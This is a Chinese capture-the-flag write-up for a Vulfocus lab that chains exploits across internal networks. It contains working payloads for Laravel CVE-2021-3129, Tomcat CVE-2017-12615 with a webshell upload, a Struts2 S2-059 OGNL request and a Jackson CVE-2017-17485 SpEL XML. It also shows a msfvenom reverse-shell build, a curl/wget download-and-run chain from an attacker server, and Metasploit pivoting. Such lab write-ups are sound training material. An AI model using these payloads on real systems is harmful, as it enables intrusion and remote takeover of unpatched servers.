Vulfocus靶场-内网死角场景WP

匿名者  1041天前

微信截图_20220215155130.png

一、入口初探

image-20211227164817828.png

版本信息:Laravel v8.41.0

漏洞CVE-2021-3129 远程代码执行

利用:

https://github.com/zhzyker/CVE-2021-3129
[root@lyqzitm4zttepqpb-0724445 CVE-2021-3129]# python3 exp.py http://123.58.236.76:53681/
[*] Try to use Laravel/RCE1 for exploitation.
[+]exploit:
[*] Laravel/RCE1 Result:


[*] Try to use Laravel/RCE2 for exploitation.
[+]exploit:
[*] Laravel/RCE2 Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Try to use Laravel/RCE3 for exploitation.
[+]exploit:
[*] Laravel/RCE3 Result:


[*] Try to use Laravel/RCE4 for exploitation.
[+]exploit:
[*] Laravel/RCE4 Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Try to use Laravel/RCE5 for exploitation.
[+]exploit:
[*] Laravel/RCE5 Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Try to use Laravel/RCE6 for exploitation.
[+]exploit:
[*] Laravel/RCE6 Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Try to use Laravel/RCE7 for exploitation.
[+]exploit:
[*] Laravel/RCE7 Result:


[*] Try to use Monolog/RCE1 for exploitation.
[+]exploit:
[*] Monolog/RCE1 Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Try to use Monolog/RCE2 for exploitation.
[+]exploit:
[*] Monolog/RCE2 Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Try to use Monolog/RCE3 for exploitation.
[+]exploit:
[*] Monolog/RCE3 Result:


[*] Try to use Monolog/RCE4 for exploitation.
[+]exploit:
[*] Monolog/RCE4 Result:

利用成功,可以看到很多点都成功执行了id命令,修改RCE2的命令为ls /tmp获取flag

image-20211227165339457.pngimage-20211227165455177.png

显示的时候末尾少个}

接下来准备上线msf

msf生产linux后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -f elf > xxxx.elf

image-20220211143513878.png

配置msf linux/x86/meterpreter/reverse_tcp payload监听

image-20220211143705177.png

在xxx.elf目录开启web服务用来下载
python3 -m http.server 8008

image-20220211143735376.png

更改CVE-2021-3129/exp.py 多处

curl -O http://xxxxxx:8008/8091.elf
chmod 777 8091.elf
./8091.elf

image-20220215100129570.png

成功上线

image-20220211150611180.png

添加路由

发现两段内部网络

192.120.2.0/24(此网段是靶机与靶场连接的,没有目标)

192.120.4.0/24

image-20220211150830453.png

二、漫游内网

使用use auxiliary/scanner/portscan/tcp模块探测192.120.4.0/24网段

发现192.120.4.2:8080

meterpreter > background
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.120.4.0/24
rhosts => 192.120.4.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 22,23,80,443,8080,8081,3389,445,143,6379
ports => 22,23,80,443,8080,8081,3389,445,143,6379
msf6 auxiliary(scanner/portscan/tcp) > set threads 20
threads => 20
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.120.4.2:          - 192.120.4.2:8080 - TCP OPEN
[+] 192.120.4.3:          - 192.120.4.3:80 - TCP OPEN
[+] 192.120.4.1:          - 192.120.4.1:80 - TCP OPEN
[*] 192.120.4.0/24:       - Scanned  41 of 256 hosts (16% complete)
[*] 192.120.4.0/24:       - Scanned  56 of 256 hosts (21% complete)
[*] 192.120.4.0/24:       - Scanned  80 of 256 hosts (31% complete)
[*] 192.120.4.0/24:       - Scanned 104 of 256 hosts (40% complete)
[*] 192.120.4.0/24:       - Scanned 128 of 256 hosts (50% complete)
[*] 192.120.4.0/24:       - Scanned 158 of 256 hosts (61% complete)
[*] 192.120.4.0/24:       - Scanned 184 of 256 hosts (71% complete)
[*] 192.120.4.0/24:       - Scanned 205 of 256 hosts (80% complete)
[*] 192.120.4.0/24:       - Scanned 233 of 256 hosts (91% complete)
[*] 192.120.4.0/24:       - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

使用use auxiliary/server/socks_proxy模块开启socks5代理,代理浏览器访问192.120.4.2:8080

image-20220211153029806.pngimage-20220211153213847.pngimage-20220211153122900.png

使用SocksCap64代理cmd.exe,使用vulmap扫描192.120.4.2:8080

image-20220211154803671.png

发现存在CVE-2017-12615

上传哥斯拉jsp木马

继续使用SocksCap64代理cmd.exe

curl -v -X PUT --data-binary @shell.jsp "http://192.120.4.2:8080/shell.jsp/"

image-20220211155356308.png

哥斯拉代理,然后连接

image-20220214221816411.png

拿到第二台机器的flag

image-20220211155607939.png

查看ip发现192.120.1.0/24网段

image-20220211161621751.png

上传MSF木马,上线MSF

image-20220211162302490.png

添加192.120.1.0/24网段路由

image-20220211162357317.png

扫描192.120.1.0/24网段,发现192.120.1.3:8080

image-20220211162541484.png

浏览器访问

image-20220211162610821.png

测试存在漏洞S2-059

image-20220211171337245.png

需要用到burp进行发包

浏览器把流量发到burp,然后burp再把流量发到msf的socks

image-20220214165035528.png

发送payload得到flag

POST /index.action HTTP/1.1
Host: 192.120.1.2:8080
Content-Length: 586
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.120.1.2:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.120.1.2:8080/index.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=EBD7FC6F70573BD03F46F8E43E2DBC91
Connection: close

skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20%2Ftmp').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d

image-20220214165115467.png

上线msf,和之前一样

先wget下载elf文件

image-20220214165313523.pngimage-20220214165339311.pngchmod给执行权限

image-20220214165454304.png

再执行上线MSF

image-20220214165613742.png

添加路由,扫描192.120.3.0/24网段

image-20220214165658822.pngimage-20220214170307123.png

发现IP端口192.120.3.2:8080

image-20220214170655608.png

三、CVE-2017-17485

经过尝试发现漏洞为CVE-2017-17485

创建spel.xml

<beans xmlns="http://www.springframework.org/schema/beans"
      xmlns:xsi="http://www.w3.org/2001/xmlSchema-instance"
      xsi:schemaLocation="     http://www.springframework.org/schema/beans     http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder">
      <constructor-arg>
          <array>
              <value>wget</value>
              <value>9135gi.dnslog.cn</value>
          </array>
      </constructor-arg>
      <property name="any" value="#{ pb.start() }"/>
  </bean>
</beans>
python3 -m http.server 8087         python开启web8087,让其加载spel.xml

image-20220214225701072.png

POST /exploit HTTP/1.1
Host: 192.120.3.2:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 143

{
"param": [
  "org.springframework.context.support.FileSystemxmlApplicationContext",
  "http://VPS-IP:8087/spel.xml"
]
}

image-20220214225600321.pngimage-20220214225719146.png

上线MSF获取FLAG

python3 -m http.server 8088         8088为下载elf文件端口

image-20220214230923405.pngimage-20220214231049521.pngimage-20220214231656969.pngimage-20220214231711787.png

上线拿到最后的flag

image-20220214231755734.png

1.png

最新评论

昵称
邮箱
提交评论